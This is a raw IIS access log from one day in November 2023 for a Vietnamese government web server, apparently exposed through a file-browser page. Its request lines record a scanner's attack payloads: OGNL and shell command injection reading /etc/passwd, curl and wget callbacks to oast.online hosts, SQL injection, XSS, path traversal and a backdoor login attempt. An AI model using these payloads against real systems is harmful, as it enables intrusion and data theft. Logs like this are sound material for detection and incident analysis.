????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231124.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 00:14:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 00:14:13 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 616 2023-11-24 00:20:54 103.153.214.94 GET /passport/index.php action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 00:38:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 00:38:04 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Euimj.txt 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 68 2023-11-24 00:38:06 103.153.214.94 GET /include/uimj.txt - 443 - 173.239.196.194 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 64 2023-11-24 00:49:13 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 75 2023-11-24 00:49:14 103.153.214.94 POST /cgi-bin/system_log.cgi - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 64 2023-11-24 01:00:58 103.153.214.94 POST /login - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 bcvt.kontum.gov.vn/module/login/login.html 405 0 1 67 2023-11-24 01:08:18 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 66 2023-11-24 01:09:10 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 443 - 173.239.196.193 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 65 2023-11-24 01:16:43 103.153.214.94 GET /plus/ajax_street.php act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 70 2023-11-24 01:21:56 103.153.214.94 POST /wp-admin/admin-ajax.php action=moove_read_xml 443 - 173.239.196.193 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 66 2023-11-24 01:23:25 103.153.214.94 GET /plus/ajax_street.php act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 66 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 01:40:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 01:40:18 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 66 2023-11-24 01:45:48 103.153.214.94 POST /lib/crud/userprocess.php - 443 - 173.239.196.195 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 66 2023-11-24 01:45:50 103.153.214.94 GET /login.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 63 2023-11-24 01:45:50 103.153.214.94 POST /lib/crud/userprocess.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 64 2023-11-24 01:51:48 103.153.214.94 GET / p=1 443 - 173.239.196.195 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 77 2023-11-24 02:01:35 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 69 2023-11-24 02:08:57 103.153.214.94 POST /var - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 64 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 02:48:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 02:48:40 103.153.214.94 GET /console/login/LoginForm.jsp - 443 - 173.239.196.194 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 340 2023-11-24 02:54:18 103.153.214.94 GET /fuel/login/ - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 327 2023-11-24 02:54:18 103.153.214.94 POST /fuel/login/ - 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 65 2023-11-24 02:54:20 103.153.214.94 GET /fuel/pages/items/ search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 66 2023-11-24 02:55:04 103.153.214.94 GET /api/config - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 2 2477 2023-11-24 03:09:37 103.153.214.94 POST /login.htm - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 69 2023-11-24 03:10:20 103.153.214.94 GET /Items/RemoteSearch/Image ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 67 2023-11-24 03:17:39 103.153.214.94 GET /manage/fileDownloader sec=1 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 66 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 03:58:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 03:58:30 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 349 2023-11-24 04:09:35 103.153.214.94 GET /index.php page=/etc/passwd%00 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 69 2023-11-24 04:22:50 103.153.214.94 GET /+CSCOE+/session_password.html - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 11 0 71 2023-11-24 04:25:53 103.153.214.94 GET /dashboard/view-chair-list.php table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 70 2023-11-24 04:28:45 103.153.214.94 GET /server/ - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-24 04:43:44 103.153.214.94 GET /q start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://clf0mb8n3tct4nj5icfgdfeo9b3j1agm9.oast.online%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 69 2023-11-24 04:45:50 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 05:05:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 05:05:04 103.153.214.94 POST /goform/setSysAdm - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn/login.shtml 405 0 1 67 2023-11-24 05:05:22 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 63 2023-11-24 05:10:22 103.153.214.94 POST /actions/authenticate.php - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 87 2023-11-24 05:15:12 103.153.214.94 POST /auth/newpassword - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 69 2023-11-24 05:28:08 103.153.214.94 GET / - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 92 2023-11-24 05:28:08 103.153.214.94 POST /checkValid - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 65 2023-11-24 05:28:10 103.153.214.94 GET /public/css/2YXBU1D5fm2N6kPqTvN9zNxWfyH.css - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 69 2023-11-24 05:42:25 103.153.214.94 POST /assets/php/upload.php - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 http://bcvt.kontum.gov.vn 405 0 1 66 2023-11-24 05:42:27 103.153.214.94 GET /assets/data/usrimg/2yxbuuuxhbzu8t4lptuojcrol3r.php - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 62 2023-11-24 05:42:34 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//clf0mb8n3tct4nj5icfgs5f7kntszdsq3.oast.online+-H+'User-Agent%3a+WM1R3O'%60 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 63 2023-11-24 05:42:39 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//clf0mb8n3tct4nj5icfgcsrcw3r736m95.oast.online+-H+'User-Agent%3a+WM1R3O'%60 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 61 2023-11-24 05:57:38 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 64 2023-11-24 06:04:57 103.153.214.94 GET /upload/userfiles/image/2YXBUdx9d6h5laE18LEkzyAOU2A.png - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 71 2023-11-24 06:07:07 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 76 2023-11-24 06:07:09 103.153.214.94 GET /ext-js/index.html - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 63 2023-11-24 06:13:17 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 443 - 173.239.196.193 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 69 2023-11-24 06:26:22 103.153.214.94 POST /dfsms/ - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 76 2023-11-24 06:32:17 103.153.214.94 GET /cgi-bin/libagent.cgi type=J&type=J 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 http://bcvt.kontum.gov.vn/cgi-bin/libagent.cgi?type=J 200 0 0 66 2023-11-24 06:38:14 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 68 2023-11-24 06:38:55 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login&app=main&inc=core_auth&route=login 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 http://bcvt.kontum.gov.vn/index.php?app=main&inc=core_auth&route=login 200 0 0 73 2023-11-24 06:53:53 103.153.214.94 GET / author=1&author=1 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 http://bcvt.kontum.gov.vn/?author=1 200 0 0 71 2023-11-24 06:53:55 103.153.214.94 GET / - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 http://bcvt.kontum.gov.vn/ 200 0 0 64 2023-11-24 07:02:12 103.153.214.94 POST /auth/requestreset - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 70 2023-11-24 07:02:14 103.153.214.94 POST /auth/requestreset - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 64 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 07:19:33 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 07:19:33 103.153.214.94 POST /EemAdminService/EemAdmin - 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 66 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 07:40:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 07:40:03 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 70 2023-11-24 07:42:32 103.153.214.94 GET / - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 - 200 0 0 69 2023-11-24 07:42:32 103.153.214.94 GET /runtime-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 31 2023-11-24 07:42:32 103.153.214.94 GET /polyfills-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 86 2023-11-24 07:42:32 103.153.214.94 GET /styles-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 127 2023-11-24 07:42:32 103.153.214.94 GET /main-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 70 2023-11-24 07:42:33 103.153.214.94 GET /vendor-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 841 2023-11-24 07:42:34 103.153.214.94 GET /manager-manager-module-ngfactory-es2015.js - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 889 2023-11-24 07:42:34 103.153.214.94 GET /assets/images/logo.png - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 128 2023-11-24 07:42:34 103.153.214.94 GET /assets/images/PTI_GDT.png - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 70 2023-11-24 07:42:34 103.153.214.94 GET /favicon.ico - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 87 2023-11-24 07:42:58 103.153.214.94 POST /api/Login/Authenticate - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 401 0 0 7373 2023-11-24 07:43:51 103.153.214.94 POST /api/Login/Authenticate - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 401 0 0 81 2023-11-24 07:43:59 103.153.214.94 POST /api/Login/Authenticate - 443 - 171.229.18.82 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 401 0 0 65 2023-11-24 07:44:15 103.153.214.94 GET /manager/ho-so/list - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 - 200 0 0 15 2023-11-24 07:44:17 103.153.214.94 GET /ho-so-ho-so-module-ngfactory-es2015.js - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/manager/ho-so/list 200 0 0 30 2023-11-24 07:44:44 103.153.214.94 POST /api/Login/Authenticate - 443 - 171.229.18.81 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+SFive/76.1+Chrome/76.1.3809.94+Safari/537.36 https://bcvt.kontum.gov.vn/login 401 0 0 73 2023-11-24 07:58:25 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://clf0mb8n3tct4nj5icfg4qmm87f73xtzt.oast.online%23 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 68 2023-11-24 07:58:39 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 64 2023-11-24 08:07:37 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 68 2023-11-24 08:07:40 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 443 - 173.239.196.194 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 66 2023-11-24 08:07:50 103.153.214.94 POST /session/create - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 64 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 08:41:35 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 08:41:35 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 443 - 173.239.196.194 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 418 2023-11-24 08:48:42 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 443 - 173.239.196.197 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 09:04:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 09:04:09 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 68 #Software: Microsoft 